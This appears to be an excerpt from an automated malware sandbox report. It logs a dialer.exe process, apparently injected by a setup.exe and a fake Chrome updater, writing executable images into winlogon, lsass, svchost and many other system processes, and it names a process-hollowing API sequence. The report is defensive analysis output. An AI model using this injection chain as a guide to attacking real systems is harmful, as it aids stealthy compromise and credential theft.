                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\cmd.exe base: 15AD96F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\reg.exe base: 1E3D8050000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208620F0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208623A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 283142A0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 283142D0000 protect: page execute and read and write
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A131C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,17_2_00007FF65A131C88
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC67273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0B1273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6133273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEFF273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8799273C
                                  Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 5377273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D53273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5B38273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBFD273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5904273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9E7273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7316273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4E86273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 473C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F9D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 83BC273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3F7273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A415273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDF3273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C026273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C9F3273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 644B273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B2A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F6273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2AB4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ADB273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25DA273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F535273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F0D6273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FFB273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C257273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8BCE273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6694273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13EF273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D57273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 69B4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC74273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5DA7273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 199D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F389273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3B8273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 40E4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A653273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 27BC273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7B15273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 621A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F48273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8B4B273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 683D273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 881273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2E26273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6C5E273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D593273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC65273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7874273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8D0A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB4C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2A64273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CF3273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 644F273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4935273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 60D9273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E7B273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2F7C273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E815273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5234273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9DA9273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 602E273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5515273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F7B1273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A685273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E542273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B9F8273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2C76273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9523273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BEF4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 412F273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A4D3273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6ADF273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF38273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 86AE273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 86D1273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD23273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 20C4273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6B76273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6BA1273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D96F273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D805273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 620F273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 623A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 142A273C
                                  Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 142D273C
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEFF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8810000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF644F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D90000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 28855150000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25EF7B10000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209A6850000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 238E5420000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 283B9F80000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1FC2C760000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F095230000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1AFBEF40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 222412F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29CA4D30000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2786ADF0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF380000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F086AE0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 1F086D10000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\reg.exe base: 1E5DD230000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 20D20C40000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20893350000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616B760000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BA10000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 15AD96F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\reg.exe base: 1E3D8050000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208620F0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 208623A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142A0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 283142D0000 value starts with: 4D5A
                                  Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 8810000 value: 4D
                                  Source: C:\ProgramData\setup.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonlyJump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
                                  Source: C:\Program Files\Google\Chrome\updater.exeSection loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly
                                  Source: C:\ProgramData\setup.exeThread register set: target process: 6832Jump to behavior
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 8096
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 2784
                                  Source: C:\Program Files\Google\Chrome\updater.exeThread register set: target process: 1508
                                  Source: C:\ProgramData\setup.exeMemory written: C:\Windows\System32\dialer.exe base: A024D3C010Jump to behavior
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 6C6FCE3010
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: D9DDDD2010
                                  Source: C:\Program Files\Google\Chrome\updater.exeMemory written: C:\Windows\System32\dialer.exe base: 2FA04EF010
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 15AAF310000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 2616BAD0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 20862490000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEFF0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
                                  Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000
